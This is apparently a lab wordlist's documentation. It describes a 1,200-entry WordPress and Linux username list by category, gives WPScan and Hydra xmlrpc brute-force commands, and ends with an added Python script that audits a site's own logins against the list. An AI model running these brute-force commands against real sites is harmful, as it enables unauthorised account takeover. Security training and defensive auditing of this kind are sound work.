users.txt contains 1,200 username entries drawn from the most common categories encountered on real WordPress installations and Linux servers. The list is designed to give broad coverage of plausible login names without growing so large that brute-force attempts become impractically slow in lab environments.
These wordlists are exclusively for educational lab environments. Never run them against systems you do not own or have explicit written permission to test.

Category breakdown

Real first names

Common English and Western first names that administrators frequently use as WordPress usernames: john, jane, alice, bob, mary, admin, evelyn, anthony, dorothy, and more.

System accounts

Built-in UNIX accounts present on most Linux distributions: root, daemon, nobody, www-data, syslog, sshd, bin, messagebus, ntp, and similar.

Service accounts

Accounts tied to popular server software: apache, nginx, mysql, postgres, redis, rabbitmq, memcached, zookeeper, kafka, elasticsearch, docker, and more.

Security tools

Accounts created by security and monitoring products: nagios, zabbix, grafana, kibana, splunk, wazuh, graylog, prometheus, falco, ossec, snyk, crowdstrike, and others.

DevOps tooling

Accounts associated with CI/CD and infrastructure tools: jenkins, gitlab, github, bitbucket, terraform, ansible, vagrant, puppet, chef, airflow, nomad, concourse, and more.

Job roles

Descriptive role-based usernames common in SMB WordPress setups: admin, operator, developer, sysadmin, webmaster, editor, manager, analyst, auditor, devops, helpdesk, support, and others.

Generic numeric accounts

Programmatically generated accounts in the format userNNNN (e.g. user1003, user2345, user9481). These represent bulk-created accounts or subscriber accounts and make up the majority of the list — roughly 600 entries.

Miscellaneous tokens

Protocol names, environment labels, and infrastructure terms sometimes used as WordPress usernames: oauth, saml, totp, staging, prod, backup, replica, primary, secondary, and similar.

Sample entries

The table below shows a representative selection of entries spanning every major category.
Username    Category
root        System account
daemon      System account
nobody      System account
www-data    System account
syslog      System account
apache      Service account
nginx       Service account
mysql       Service account
postgres    Service account
redis       Service account
nagios      Security tool
zabbix      Security tool
grafana     Security tool
splunk      Security tool
jenkins     DevOps tool
gitlab      DevOps tool
ansible     DevOps tool
terraform   DevOps tool
admin       Job role / first name
developer   Job role
sysadmin    Job role
webmaster   Job role
john        Real first name
alice       Real first name
jane        Real first name
user3024    Generic numeric
user9481    Generic numeric
user1188    Generic numeric

Using this wordlist

WPScan

wpscan --url http://TARGET/lab/ \
  --usernames users.txt \
  --passwords passwords.txt \
  --password-attack xmlrpc \
  --max-threads 50

See the WPScan guide for full options and rate-limiting recommendations.

Hydra

hydra -L users.txt -P passwords.txt TARGET http-post-form \
  "/lab/xmlrpc.php:<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>^USER^</string></value></param><param><value><string>^PASS^</string></value></param></params></methodCall>:Incorrect username or password" \
  -t 50

See the Hydra guide for form parameter tuning and throttle settings.

users.txt is intentionally structured so the most likely WordPress usernames (real names, role names, and common admin aliases) appear in the first ~600 lines. Run a quick targeted pass with head -600 users.txt before doing a full sweep with numeric accounts.
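
The same ordering lets a defender check which of a site's own logins an early pass would reach. The script below is an added example, not part of the original wordlist project; the function names, the sample data and the case-insensitive comparison are assumptions.

```python
import re

# Constructed stand-in for users.txt: a few entries from the page's categories,
# ordered as the page describes (names and roles first, numeric accounts last).
SAMPLE_WORDLIST = ["admin", "john", "alice", "webmaster", "editor",
                   "root", "www-data", "jenkins", "user1003", "user2345"]

NUMERIC = re.compile(r"^user\d{4}$")  # the userNNNN format described on the page


def load_wordlist(lines):
    """Map each lowercased username to its 1-based line number (first hit wins)."""
    index = {}
    for lineno, raw in enumerate(lines, start=1):
        name = raw.strip().lower()
        if name and name not in index:
            index[name] = lineno
    return index


def audit_logins(logins, index, priority_cutoff=600):
    """Rate a site's own logins by how early the wordlist would reach them.

    priority_cutoff mirrors the ~600-line targeted pass mentioned above.
    Comparing case-insensitively is an assumption of this example.
    """
    report = []
    for login in logins:
        key = login.strip().lower()
        line = index.get(key)
        if line is not None:
            tier = "high" if line <= priority_cutoff else "listed"
        elif NUMERIC.match(key):
            tier = "pattern"   # absent from the list but guessable by format
        else:
            tier = "unlisted"
        report.append((login, tier, line))
    return report


if __name__ == "__main__":
    # Constructed export of a lab site's login names.
    site_logins = ["Admin", "user7777", "k.varga-ops", "jenkins"]
    index = load_wordlist(SAMPLE_WORDLIST)
    # Cutoff of 5 only because the sample list is ten lines long.
    for login, tier, line in audit_logins(site_logins, index, priority_cutoff=5):
        print(f"{login:<14}{tier:<10}line={line}")
```

Logins rated high or listed are candidates for renaming or for stricter lockout and second-factor policy.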
